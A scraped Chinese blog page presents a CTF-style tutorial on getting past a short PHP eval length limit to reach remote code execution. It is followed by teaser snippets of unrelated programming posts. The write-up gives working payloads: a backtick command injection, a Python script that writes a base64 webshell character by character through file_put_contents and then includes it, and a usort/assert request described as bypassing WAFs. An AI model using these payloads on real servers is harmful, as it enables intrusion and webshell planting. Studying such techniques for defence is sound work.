当前位置：首页 > news >正文

RCE---eval长度限制绕过技巧

news 2026/2/8 13:14:14

题目源码

方法一：命令执行的利用

方法二：file_put_contents（本地文件包含的利用）

方法三：usort(…$_GET);

题目源码

<?php
$param = $_REQUEST['param'];
if(strlen($param)<17 && stripos($param,'eval') === false && stripos($param,'assert') === false) {eval($param);
}
?>

根据题目：传参的长度不能长于17，并且不能存在eval和assert

方法一：命令执行的利用

反引号可以用来执行命令，当我们传入参数时，反引号里面的内容会执行，然后再传给param接收，此时如果我们通过参数1注入我们想要执行的命令，那我们的命令将会被执行。

注意：eval命令结束必须存在 ;

?param=`$_GET[1]`;&1=whoami

ok,命令执行成功。

方法二：file_put_contents（本地文件包含的利用）

查询官方文档，发现file_put_contents 可以将字符一个个地写入一个文件中，使用file_put_contents需要三个参数：

filename：要被写入数据的文件名。

data：要写入的数据。类型可以是 string，array 或者是 stream 资源。

如果 data 指定为 stream 资源，这里 stream 中所保存的缓存数据将被写入到指定文件中，这种用法就相似于使用 stream_copy_to_stream() 函数。

参数 data 可以是数组（但不能为多维数组），相当于 file_put_contents($filename, join('', $array))。

flags：flags 的值可以是以下 flag 使用 OR (|) 运算符进行的组合。

从官方给出的例子来看，我们可以得到下面的命令：

?param=$_GET[1](filename,Data,files);&1=file_put_contents

如果我们传入的payload是这样的，很明显不对，超出了长度，我通过在网络上查询发现，第三个参数在php底层C语言中可以用8表示。

所以我们可以：

?param=$_GET[a](N,a,8);&a=file_put_contents

file_put_contents的第一个参数是文件名，我传入N。PHP会认为N是一个常量，但我之前并没有定义这个常量，于是PHP就会把它转换成字符串'N'；第二个参数是要写入的数据，a也被转换成字符串'a'；第三个参数是flag，当flag=8的时候内容会追加在文件末尾，而不是覆盖。

成功传入。

我们可以用这种方法写入我们的一句话木马，，但是使用file_put_contents这个函数时无法对一些特殊字符生效，所以我们得将一句话木马进行base64编码

但是一个一个传入太过繁琐，使用python编写一个脚本就可以实现了

import requestsstring = "PD9waHAgZXZhbCgkX1BPU1RbOV0pOw"for i in string:payload = "http://192.168.44.136/web.php?param=$_GET[1](N,{},8);&1=file_put_contents".format(i)response = requests.get(payload)if response.status_code == 200:print(i)else:print(response.status_code)

可以看出，运行成功了，去查看一下文件N中是否写入。

确实写入了我们的一句话木马的base64编码，接下来传入下面的payload

?param=include$_GET[0];&0=php://filter/read=convert.base64-decode/resource=N

方法三：usort(…$_GET);

tip：此方法为php5的特性

POST /web.php?1[]=test&1[]=var_dump($_SERVER);&2=assert HTTP/1.1
Host: localhost:8081
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22param=usort(...$_GET);

利用抓包工具进行抓包，然后将包修改为如上：

GET变量被展开成两个参数`['test', 'phpinfo();']`和`assert`，传入usort函数。usort函数的第二个参数是一个回调函数`assert`，其调用了第一个参数中的`phpinfo();`。修改`phpinfo();`为webshell即可。

ok,完成。

注意，这个方法基本无视任何WAF。

RCE---eval长度限制绕过技巧

目录题目源码方法一：命令执行的利用方法二：file_put_contents（本地文件包含的利用） 方法三：usort(…$_GET); 题目源码 <?php $param $_REQUEST[param]; if(strlen($param)<17 && stripos($par…...

编程日记 2024/8/16 15:02:33

C++11标准模板（STL）- 算法库 - 类似 std::accumulate，但不依序执行 -（std::reduce）

算法库算法库提供大量用途的函数（例如查找、排序、计数、操作），它们在元素范围上操作。注意范围定义为 [first, last) ，其中 last 指代要查询或修改的最后元素的后一个元素。类似 std::accumulate，但不依序执行 std…...

编程日记 2024/8/16 15:01:32

反射机制的介绍

什么是反射 Java反射机制是Java语言一个很重要的特性，它使得Java具有了“动态性”。在Java程序运行时，对于任意的一个类，我们能不能知道这个类有哪些属性和方法呢？对于任意的一个对象，我们又能不能调用它任意的方法&a…...

编程日记 2024/8/16 14:56:27

AI图文带货，手把手教学，傻瓜操作，轻松日入500+，小白教程

通过自媒体的力量，帮助普通人成为企业家。建立自己的财富事业，用你的影响力帮助更多的人。从而实现你更加自由的生活方式。记住关注我，不要错过每一次分享。对标账号作为公司的一个项目实际拆解者，最热门的项目怎么能不拆…...

编程日记 2024/8/16 14:55:25

java：实现简单的验证码功能

效果实现思路验证码图片的url由后端的一个Controller生成，前端请求这个Controller接口的时候根据当前时间生成一个uuid，并把这个uuid在前端使用localStorage缓存起来，下一次还是从缓存中获取。 Controller生成验证码之后，把前…...

编程日记 2024/8/16 14:53:22

MybatisPlus使用指南

MybatisPlus 1. 快速入门1.1 入门案例1.2 常见注解1.3 常见配置 2. 核心功能2.1 条件构造器2.2 自定义SQL2.3 Service接口 3. 扩展功能3.1 代码生成3.2 静态工具3.3 逻辑删除 4. 插件功能4.1 分页插件4.2 通用分页实体 1. 快速入门 1.1 入门案例步骤一：引入Mybat…...

编程日记 2024/8/16 14:52:21

5. MongoDB 集合创建、更新、删除

1. 创建集合 1.1 语法 db.createCollection(name, options) 参数说明： name: 要创建的集合名称。options: 可选参数, 指定有关内存大小及索引的选项。 options 可以是如下参数： 参数名类型描述示例值capped布尔值是否创建一个固定大小的集合。truesize…...

编程日记 2024/8/16 14:46:14

PHP中如何将变量从函数传递给acf_add_filter

在PHP开发中，我们有时需要将变量从函数传递给acf的add_filter钩子。这样做可以让我们在acf字段加载时，对字段值进行动态修改。下面，我将详细介绍如何实现这一功能。在acf中，我们使用add_filter来添加钩子，对字段的加…...

编程日记 2024/8/16 14:45:13

KNN算法的使用

目录一、KNN 算法简介二、KNN算法的使用 1.读取数据 2.处理数据三、训练模型 1.导入KNN模块 2.训练模型 3.出厂前测试四、进行测试 1.处理数据 2.进行测试总结一、KNN 算法简介 KNN 是一种基于实例的学习算法。它通过比较样本之间的距离来进行预测。算法的核心…...

编程日记 2024/8/16 14:44:12

导入jar包，或者maven  <dependency><groupId>commons-fileupload</groupId><artifactId>commons-fileupload</artifactId><version>…...

编程日记 2024/8/16 14:43:10

MySQL 数据库经验总结

一、数据库操作 1. 创建数据库 CREATE DATABASE database_name;例如，创建一个名为 my_database 的数据库： CREATE DATABASE my_database;2. 选择数据库 USE database_name;要使用刚才创建的 my_database 数据库： USE my_database;3. 删除…...

编程日记 2024/8/16 14:41:08

Python环境安装及PIP安装（Mac OS版）

官网 https://www.python.org/downloads/ 安装python python-3.12.1-macos11.pkg下载后，安装一直下一步即可验证是否安装成功，执行python3命令和pip3命令配置环境变量获取python3安装位置并配置在.bash_profile #查看python路径 which python3#…...

编程日记 2024/8/16 14:40:07

2024自动驾驶(多模态)大模型综述：从DriveGPT4、DriveMLM到DriveLM、DriveVLM

前言由于今年以来，一直在不断深挖具身智能机器人相关，而自动驾驶其实和机器人有着无比密切的联系，甚至可以认为，汽车就是一个带着4个轮子的机器人加之个人认为，目前大模型落地潜力最大的两个方向，一个是…...

编程日记 2024/8/16 14:39:06

晨控CK-GW08-EC与汇川AC801系列PLC的EtherCAT通讯连接说明手册

晨控CK-GW08-EC与汇川AC801系列PLC的EtherCAT通讯连接说明手册晨控CK-GW08-EC是一款支持标准工业通讯协议EtherCAT的网关控制器,方便用户集成到PLC等控制系统中。系统还集成了8路读写接口，用户可通过通信接口使用EtherCAT协议对8路读写接口所连接的读卡器进行相对…...

编程日记 2024/8/16 14:37:04

向上or向下调整建堆的时间复杂度的本质区别的讲解

知识点：（N代表节点数，h代表高度） 1：高度为h的满二叉树节点个数N为 2^（h）-1 即N 2^（h）-1 2：所以h log（N1） 一：向上…...

编程日记 2024/8/16 14:36:03

阿一网络安全实战演练之利用 REST URL 中的服务器端参数污染

所需知识要解决这个实验室问题，您需要了解以下内容： 如何确定用户输入是否包含在服务器端的 URL 路径或查询字符串中。如何使用路径遍历序列尝试更改服务器端请求。如何查找 API 文档。这些内容在我们的 API 测试学院主题中有涵盖。进入实验室研…...

编程日记 2024/8/16 14:32:58

[游戏开发] LuaTable转string存读二进制文件

UE5和Unity通用此方案，只不过读写文件的接口略有不同，lua代码的处理是相同的。下面两个方法是 LuaTable和字符串互相转换的代码 function XUtils.luaTableToString(tab, sp)sp sp or ""local s ""for k,v in pairs(tab) doif t…...

编程日记 2024/8/16 14:31:57